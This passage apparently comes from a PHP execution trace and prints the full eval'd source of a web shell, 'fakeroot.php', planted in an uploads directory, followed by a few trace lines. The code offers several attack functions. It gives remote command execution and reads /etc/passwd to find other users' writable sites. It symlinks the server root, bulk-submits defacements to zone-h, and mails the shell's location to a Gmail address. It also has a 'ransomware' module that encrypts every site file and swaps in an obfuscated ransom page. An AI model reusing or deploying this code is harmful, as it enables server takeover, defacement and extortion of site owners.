\'cmd\') {\r\n\techo "<center><form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>".get_current_user\r\n\r\n()."@".$_SERVER[\'SERVER_ADDR\'].": ~ $ </font>\r\n\t<input type=\'text\' size=\'30\' height=\'10\' name=\'cmd\'><input \r\n\r\ntype=\'submit\' name=\'do_cmd\' value=\'>>\'>\r\n\t</form></center>";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "<pre>".exe($_POST[\'cmd\'])."</pre>";\r\n\t}\r\n}\r\n?>\r\n<?php\r\nif($_GET[\'do\'] == \'jumping\') {\r\n\t$i = 0;\r\n\techo "<pre><div class=\'margin: 5px auto;\'>";\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\tforeach($user_jumping[1] as $user_ctt_jump) {\r\n\t\t\t\t$user_jumping_dir = "/home/$user_ctt_jump/public_html";\r\n\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t$i++;\r\n\t\t\t\t\t$jrw = "[<font color=lime>R</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$jrw = "[<font color=lime>RW</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo $jrw;\r\n\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\techo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\tif($user_jumping_url == $user_ctt_jump) {\r\n\t\t\t\t\t\t\t\t\techo " => ( <u>$dj</u> )<br>";\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($i == 0) { \r\n\t} else {\r\n\t\techo "<br>Total ".$i." domain di ".gethostbyname($_SERVER[\'HTTP_HOST\'])."";\r\n\t}\r\n\techo "</div></pre>";\r\n}  ?>\r\n<center>\r\n<?php\r\n\r\nif($_GET[\'votr\'] == \'sym\') {\r\n   @set_time_limit(0);\r\necho " <div style=\'width:100%; height:auto;\' align=\'center\'>\r\n  ";\r\n@mkdir(\'sym\',0777);\r\n$htaccess  = "Options all \\n DirectoryIndex Sux.html \\n AddType \r\n\r\ntext/plain .php \\n AddHandler server-parsed .php \\n  AddType text/plain \r\n\r\n.html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n$write =@fopen (\'sym/.htaccess\',\'w\');\r\nfwrite($write ,$htaccess);\r\n@symlink(\'/\',\'sym/root\');\r\n$filelocation = basename(__FILE__);\r\n$read_named_conf = @file(\'/etc/named.conf\');\r\nif(!$read_named_conf)\r\n{\r\necho "gak bisa di akses [ /etc/named.conf ] </pre></center>"; \r\n}\r\nelse\r\n{\r\necho "<br><br><center><div class=\'tmp\'><table border=\'1\' bordercolor=\'#00ff00\' \r\n\r\nwidth=\'500\' cellpadding=\'1\' \r\n\r\ncellspacing=\'0\'><td>Domains</td><td>Users</td><td>symlink </td></center>";\r\nforeach($read_named_conf as $subject){\r\nif(eregi(\'zone\',$subject)){\r\npreg_match_all(\'#zone "(.*)"#\',$subject,$string);\r\nflush();\r\nif(strlen(trim($string[1][0])) >2){\r\n$UID = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$string[1][0]));\r\n$name = $UID[\'name\'] ;\r\n@symlink(\'/\',\'sym/root\');\r\n$name   = $string[1][0];\r\n$iran   = \'\\.ir\';\r\n$israel = \'\\.il\';\r\n$indo   = \'\\.id\';\r\n$sg12   = \'\\.sg\';\r\n$edu    = \'\\.edu\';\r\n$gov    = \'\\.gov\';\r\n$gose   = \'\\.go\';\r\n$gober  = \'\\.gob\';\r\n$mil1   = \'\\.mil\';\r\n$mil2   = \'\\.mi\';\r\n$malay\t= \'\\.my\';\r\n$china\t= \'\\.cn\';\r\n$japan\t= \'\\.jp\';\r\n$austr\t= \'\\.au\';\r\n$porn\t= \'\\.xxx\';\r\n$as\t\t= \'\\.uk\';\r\n$calfn\t= \'\\.ca\';\r\nif (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or \r\n\r\neregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi \r\n\r\n("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])\r\nor eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or \r\n\r\neregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])\r\nor eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or \r\n\r\neregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])\r\nor eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi \r\n\r\n("$calfn",$string[1][0]))\r\n{\r\n$name = "<div style=\' color: #FF0000 ; text-shadow: 0px 0px 1px red; \r\n\r\n\'>".$string[1][0].\'</div>\';\r\n}\r\necho "\r\n<tr>\r\n<td>\r\n<div class=\'dom\'><a target=\'_blank\' href=http://www.".$string[1]\r\n\r\n[0].\'/>\'.$name.\' </a> </div>\r\n</td>\r\n<td>\r\n\'.$UID[\'name\']."\r\n</td>\r\n<td>\r\n<a href=\'sym/root/home/".$UID[\'name\']."/public_html\' \r\n\r\ntarget=\'_blank\'>Symlink </a>\r\n</td>\r\n</tr></div> ";\r\nflush();\r\n}\r\n}\r\n}\r\n}\r\necho "</center></table></div>";   \r\n}\r\n?></center>\r\n\r\n<?php\r\nif($_GET[\'do\'] == \'zoneh\') {\r\n\tif($_POST[\'submit\']) {\r\n\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$nick =  $_POST[\'nick\'];\r\n\t\techo "Defacer Onhold: <a href=\'http://www.zone-h.org/archive/notifier=$nick/published=0\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";\r\n\t\techo "Defacer Archive: <a href=\'http://www.zone-h.org/archive/notifier=$nick\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";\r\n\t\tfunction zoneh($url,$nick) {\r\n\t\t\t$ch = curl_init("http://www.zone-h.com/notify/single");\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");\r\n\t\t\treturn curl_exec($ch);\r\n\t\t\t\t  curl_close($ch);\r\n\t\t}\r\n\t\tforeach($domain as $url) {\r\n\t\t\t$zoneh = zoneh($url,$nick);\r\n\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $zoneh)) {\r\n\t\t\t\techo "$url --> <font color=lime>OK</font><br><br>";\r\n\t\t\t} else {\r\n\t\t\t\techo "$url --> <font color=red>ERROR</font><br><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><form method=\'post\'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type=\'text\' name=\'nick\' size=\'50\' value=\'./Fake Root\'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'url\'></textarea><br>\r\n\t\t<input type=\'submit\' name=\'submit\' value=\'Submit\' style=\'width: 450px;\'>\r\n\t\t</form>";\r\n\t}}\r\n?>\r\n\r\n<?php\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'-1\');\r\nif($_GET[\'do\'] == \'ransom\') {\r\nclass deRanSomeware\r\n{\r\n   public function shcpackInstall(){\r\n    if(!file_exists(".htaencrypted")){\r\n      rename(".htaccess", ".htaencrypted");\r\n      if(fwrite(fopen(\'.htaccess\', \'w\'), "#Cracker Ransomware\\r\\n DirectoryIndex x.htm\\r\\n ErrorDocument 404 /x.htm")){\r\n            echo \'<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>\';\r\n      }\r\n      if(file_put_contents("x.htm", str_rot13(gzinflate(str_rot13(base64_decode("hUjfYts2EH4v0P/hwKHQ9iBGadxrZnFwG9AUKIYkS9oU2FggqhRy1aGks8SYTfe/71VWiRJx3YNu6Wtq38fvfgjiSWhpC2RJVpOqrbYo1Y9OJRKlKwUdwhoO5ihaoe0R5fJnaPp403ZwdJXogp9vPsQ9iwfTuMDl8eRJU5GaOraoeMJGU0zcftLVEXi43MOMX+sjwjshFMS8P4W4UKUh0R1hAtVvh24lrJABOH6YqFpDTcoQ8CeuWeeqFZI9a7FWZfbMtxLpXpqmSBP3UrSInvvV2F/AiHHi+SJ/H3daZQSJacNZ5U/UPqUsptMNMnUlHjasSCrN1pybmSlY0pNU19fn77KEHyiTpFGzNHZ8MqVYi0OYTbWbbBS9gRYdcv/sjnjQ1jQJ3YZLoXGunnfvFGfVhb+hJJ6NFGxFr8FYaQZeyTUUrURrBge6RGvQnbH7NbArkViDEn7Dgp2Bwq8q9AB46AHO4B8q0gAR86Gkpaj3QzY+8UuZh86CWUmPSq7qcSZo0Rjl+oiXbNIcpEGao+FrwHCm7X3OF231ZvS2TWxG6Hqz+3mU0rHi922n+/x5+9BvxHEb91G3seka8FE3zOu3Xsyj9OsZe8rn+yWgjIboaHAJS8TGCrhUghWW6t15SyIYa89FyBpyYtDWisJqpVWt3j+DxhmZl/SbGcG72/l3NULv8uUummjpCQO6SY/trlL3ZD9KrL5+lPVYrglGSr6X+7IlR7ZktMonrRlmFztWNco0Wulb4sWc7A9tg2asyKb28DnPFBibdJmbiiH3NC1Z8W3QlP54s4PK6izbsA6PQd4pvDUdoQ/nvvf6eX0fbWXQlSF2k5k7b7hxj2sfJaK6g7WDCjff4kHLLzk+1O00beP6pOfZcP4HWSN5PaAMtJxyhDxu25ukFglzUyfglZbwLrdrByEcMdUt2Zt+0k2tyGujsveoO6cdvV2TpFadwdW+pMAL2e3Ja0HTqZ+aPiPtYB8XwiXSa+Q2hytOnfVLhD+tE4TOUiMkXD5PPgb4lFCaj62gon3K/UhihtpaKP1+GPzDPtcAaiXzrIWLxHoaCy0dKLMzGZhEhrHUMR80337bhDF/dYTvNZzEbUXM9yKvTfiLvjzTjtL90gx+YyvFDbW2tP4/0EizizQN/FkF41kVUjE7QyvQ8JKrXzGqzbuSF85fpymnKfvlJLzLWMQsZxs6Cw9P1Bl9YLo0J4Zuq622oSVIwzHKLQMIhnMKlkQwYQH3WTfXUXrk+YQmjY0iqBdL5qkVup4hZf924PP5b2S6ikH71+z29u16KLETOyybMJW4M0s4Gv/DgoQTXnNBs+beVNm5W9L057/6r1+9fvUv")))))){\r\n            echo \'<i class="fa fa-thumbs-o-up" aria-hidden="true"></i>  x.htm (Default Page)<br>\';\r\n      }\r\n    }\r\n   }\r\n   public function shcpackUnstall(){\r\n      if( file_exists(".htaencrypted") ){\r\n        if( unlink(".htaccess") && unlink("x.htm") ){\r\n          echo \'<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>\';\r\n          echo \'<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> x.htm (Default Page)<br>\';\r\n        }\r\n        rename(".htaencrypted", ".htaccess");\r\n      }\r\n   }\r\n   public function plus(){\r\n      flush();\r\n      ob_flush();\r\n   }\r\n   public function locate(){\r\n        return getcwd();\r\n    }\r\n   public function shcdirs($dir,$method,$key){\r\n        switch ($method) {\r\n          case \'1\':\r\n            deRanSomeware::shcpackInstall();\r\n          break;\r\n          case \'2\':\r\n           deRanSomeware::shcpackUnstall();\r\n          break;\r\n        }\r\n        foreach(scandir($dir) as $d)\r\n        {\r\n            if($d!=\'.\' && $d!=\'..\')\r\n            {\r\n                $locate = $dir.DIRECTORY_SEPARATOR.$d;\r\n                if(!is_dir($locate)){\r\n                   if(  deRanSomeware::kecuali($locate,"x.htm")  && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".jpg")  && deRanSomeware::kecuali($locate,".PNG") && deRanSomeware::kecuali($locate,".gif") && deRanSomeware::kecuali($locate,".GIF") && deRanSomeware::kecuali($locate,".jpeg") && deRanSomeware::kecuali($locate,".php7")  && deRanSomeware::kecuali($locate,"prep.php") && deRanSomeware::kecuali($locate,".htaccess") ){\r\n                     switch ($method) {\r\n                        case \'1\':\r\n                           deRanSomeware::shcEnCry($key,$locate);\r\n                           deRanSomeware::shcEnDesDirS($locate,"1");\r\n                        break;\r\n                        case \'2\':\r\n                           deRanSomeware::shcDeCry($key,$locate);\r\n                           deRanSomeware::shcEnDesDirS($locate,"2");\r\n                        break;\r\n                     }\r\n                   }\r\n                }else{\r\n                  deRanSomeware::shcdirs($locate,$method,$key);\r\n                }\r\n            }\r\n            deRanSomeware::plus();\r\n        }\r\n   }\r\n   public function shcEnDesDirS($locate,$method){\r\n      switch ($method) {\r\n        case \'1\':\r\n          rename($locate, $locate.".encrypted");\r\n        break;\r\n        case \'2\':\r\n          $locates = str_replace(".encrypted", "", $locate);\r\n          rename($locate, $locates);\r\n        break;\r\n      }\r\n   }\r\n   public function shcEnCry($key,$locate){\r\n      $data = file_get_contents($locate);\r\n      $iv = mcrypt_create_iv(\r\n          mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),\r\n          MCRYPT_DEV_URANDOM\r\n      );\r\n      $encrypted = base64_encode(\r\n          $iv .\r\n          mcrypt_encrypt(\r\n              MCRYPT_RIJNDAEL_128,\r\n              hash(\'sha256\', $key, true),\r\n              $data,\r\n              MCRYPT_MODE_CBC,\r\n              $iv\r\n          )\r\n      );\r\n      if(file_put_contents($locate,  $encrypted )){\r\n         echo \'<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">  ~Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n      }else{\r\n         echo \'<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">  ~Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> \'.$locate.\' <br>\';\r\n      }\r\n   }\r\n   public function shcDeCry($key,$locate){\r\n      $data = base64_decode( file_get_contents($locate) );\r\n      $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));\r\n      $decrypted = rtrim(\r\n          mcrypt_decrypt(\r\n              MCRYPT_RIJNDAEL_128,\r\n              hash(\'sha256\', $key, true),\r\n              substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),\r\n              MCRYPT_MODE_CBC,\r\n              $iv\r\n          ),\r\n          "\\0"\r\n      );\r\n      if(file_put_contents($locate,  $decrypted )){\r\n         echo \'<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">  ~Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n      }else{\r\n         echo \'<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B"> ~ Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n      }\r\n   }\r\n   public function kecuali($ext,$name){\r\n        $re = "/({$name})/";\r\n        preg_match($re, $ext, $matches);\r\n        if($matches[1]){\r\n            return false;\r\n        }\r\n            return true;\r\n     }\r\n}\r\nif($_POST[\'submit\']){\r\nswitch ($_POST[\'method\']) {\r\n   case \'1\':\r\n      deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST[\'key\']);\r\n   break;\r\n   case \'2\':\r\n     deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST[\'key\']);\r\n   break;\r\n}\r\n}else{\r\n?>\r\n\r\n<center>\r\n\t<img src="http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif" height="50px" width="50px">\r\n\tCREATE RANSOMWARE<br><br>\r\n<form action="" method="post" style=" text-align: center;">\r\n      <select name="method" class="selecte" style="width:130px;">\r\n         <option value="1"><b>ENCRYPT</b></option>\r\n         <option value="2"><b>DECRYPT</b></option>\r\n      </select>\r\n      <input type="submit" name="submit" class="submite" value="Submit" style="width:100px;"/>\r\n      </div>\r\n</form>\r\n</center>\r\n<?php\r\n}}?>\r\n\t\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'fikriofficial4676@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "ACCESS", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>\r\n<?php\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br><center><br><br />\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="yellow">Change Permission Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="red">Change Permission Gagal</font><br />\';\r\n}\r\n}\r\necho \'<br><form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="UBAH" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="yellow">Ganti Nama Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="red">Ganti Nama Gagal</font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="UBAH" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="yellow">Berhasil Edit File</font><br/>\';\r\n}else{\r\necho \'<font color="red">Gagal Edit File</font><br/>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Save" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br/><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<font color="yellow">Directory Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="red">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<font color="yellow">File Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="red">File Gagal Dihapus</font><br/>\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="100%" border="2" style="border-color:#8B4513;" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<td><center>NAME</center></td>\r\n<td><center>SIZE</center></td>\r\n<td><center>PERMISSION</center></td>\r\n<td><center>ACTION</center></td>\r\n\r\n</tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\necho \'<tr>\r\n<td><img src="data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs="><a href="?path=\'.$path.\'/\'.$dir.\'"> \'.$dir.\'</a></td>\r\n<td><center>--</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$dir)) echo \'<font color="#C4FF00">\';\r\nelseif(!is_readable($path.\'/\'.$dir)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$dir);\r\nif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font>\';\r\n\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt" style="margin-top:6px;width:120px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">\r\n<option value="">SELECT</option>\r\n<option value="delete">DELETE</option>\r\n<option value="chmod">CHMOD</option>\r\n<option value="rename">RENAME</option>\r\n\r\n</select>\r\n<input type="hidden" name="type" value="dir">\r\n<input type="hidden" name="name" value="\'.$dir.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$dir.\'">\r\n<input type="submit" value="GO" style="margin-top:6px;width:27px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'<tr class="first"></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file($path.\'/\'.$file)) continue;\r\n$size = filesize($path.\'/\'.$file)/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho \'<tr>\r\n<td><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=\'.$path.\'/\'.$file.\'&path=\'.$path.\'"> \'.$file.\'</a></td>\r\n<td><center>\'.$size.\'</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$file)) echo \'<font color="#C4FF00">\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font>\';\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt" style="margin-top:6px;width:120px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">\r\n<option value="">SELECT</option>\r\n<option value="delete">DELETE</option>\r\n<option value="chmod">CHMOD</option>\r\n<option value="rename">RENAME</option>\r\n<option value="edit">EDIT</option>\r\n</select>\r\n<input type="hidden" name="type" value="file">\r\n<input type="hidden" name="name" value="\'.$file.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$file.\'">\r\n<input type="submit" value="GO" style="margin-top:6px;width:27px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'\r\n<center><br/><font face="Kelly Slab" color="white" style="text-shadow: 0 0 20px blue, 0 0 5px blue, 0 0 7px blue, 0 0 45px blue; font-weight:bold: blue; font-size:30px">./Fake Root was here</center>\r\n</body>\r\n</html></div>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n'	/var/www/html/uploads/fakeroot.php	7	0
3	18	0	0.008053	621160	session_start	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	5	0
3	18	1	0.008158	621912
3	18	R			TRUE
3	19	0	0.008181	621912	error_reporting	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	6	1	0
3	19	1	0.008201	621952
3	19	R			0
3	20	0	0.008220	621912	set_time_limit	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	7	1	0
3	20	1	0.008244	621976
3	20	R			FALSE
3	21	0	0.008265	621944	getcwd	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	102	0
3	21	1	0.008285	621992
3	21	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	102	$path = '/var/www/html/uploads'
3	22	0	0.008324	621992	str_replace	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	104	3	'\\'	'/'	'/var/www/html/uploads'
3	22	1	0.008346	622088
3	22	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	104	$path = '/var/www/html/uploads'
